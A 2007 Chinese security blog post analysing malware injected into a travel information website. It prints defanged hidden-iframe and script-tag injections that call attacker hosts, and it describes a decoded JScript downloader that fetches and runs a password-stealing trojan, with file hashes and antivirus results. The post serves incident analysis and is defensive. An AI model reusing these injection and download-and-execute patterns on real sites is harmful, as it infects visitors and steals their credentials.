2007年3月6日星期二

某旅游信息网站被挂马Trojan-PSW.Win32.QQRob.lp等

endurer 原创2007-02-28 第1版
该网站的网页末被加入代码:/------<iframe src=hxxp://user**.f**r**e*e.7***7169.net/y**j*1*6***6/xskj.htm width=0 height=0></iframe><iframe src=hxxp://user**.f**r**e*e.7***7169.net/y**j*1*6***6/kh0.htm width=0 height=0></iframe><script language=javascript src=hxxp://yu***s*ahi.com/js/test.js></script>------/
hxxp://user**.f**r**e*e.7***7169.net/y**j*1*6***6/xskj.htm的内容为JavaScript脚本程序,用String.fromCharCode解密变量t的值并输出。
解出的变量t的值为jscript脚本程序,功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 she.exe,保存为 %temp%/svchost.exe和%temp%/svchost.vbs,并利用Shell.Application 对象Q 的 ShellExecute 方法 来运行。
文件说明符 : d:\test\she.exe属性 : A---获取文件版本信息大小失败!创建时间 : 2007-2-28 12:40:25修改时间 : 2007-2-28 12:40:26访问时间 : 2007-2-28 0:0:0大小 : 21096 字节 20.616 KBMD5 : 1fdbf69232ca57bd9f25116def0b622b
瑞星报为:Trojan.DL.Direct.et
Scanned file: she.exe - Infected
she.exe - infected by Trojan-Downloader.Win32.Small.dzu
Statistics:
Known viruses:
274479
Updated:
27-02-2007
File size (Kb):
21
Virus bodies:
1
Files:
1
Warnings:
0
Archives:
0
Suspicious:
0

she.exe中包含信息:/---I want to dedicate this message to gates. Gates, you suck. Gatesyou really are homosexual---/会下载文件hxxp://i***.th***e***c.cn/y**j*1*6***6/js.exe,保存为:c:\js.exe
文件说明符 : d:\test\js.exe属性 : A---语言 : 英语(美国)文件版本 : 5.2.3790.1830说明 : Generic Host Process for Win32 Services版权 : (C) Microsoft Corporation. All rights reserved.备注 : 产品版本 : 5.2.3790.1830产品名称 : Microsoft(R) Windows(R) Operating System公司名称 : Microsoft Corporation合法商标 : 内部名称 : rpcs.exe源文件名 : rpcs.exe创建时间 : 2007-2-28 12:55:43修改时间 : 2007-2-28 12:54:56访问时间 : 2007-2-28 0:0:0大小 : 237568 字节 232.0 KBMD5 : 993561111ed73214fd3507ff7669f764
瑞星报为:Trojan.DL.Inject.sh
Scanned file: js.exe - Infected
js.exe - infected by Trojan-PSW.Win32.QQRob.lp
Statistics:
Known viruses:
274479
Updated:
27-02-2007
File size (Kb):
232
Virus bodies:
1
Files:
1
Warnings:
0
Archives:
0
Suspicious:
0
hxxp://user**.f**r**e*e.7***7169.net/y**j*1*6***6/kh0.htm找不到网页。
hxxp://yu***s*ahi.com/js/test.js的内容为:/------document.write("<iframe <iframe src=hxxp://yu***s*ahi.com/js/sas.htm width=0 height=0></iframe>")document.write("<iframe <iframe src=hxxp://yu***s*ahi.com/js/zj.htm width=0 height=0></iframe>")------/
hxxp://yu***s*ahi.com/js/sas.htm内容与hxxp://user**.f**r**e*e.7***7169.net/y**j*1*6***6/xskj.htm相同。
hxxp://yu***s*ahi.com/js/zj.htm找不到网页。
发帖者 时间:
标签:

没有评论:

发表评论

订阅: 博文评论 (Atom)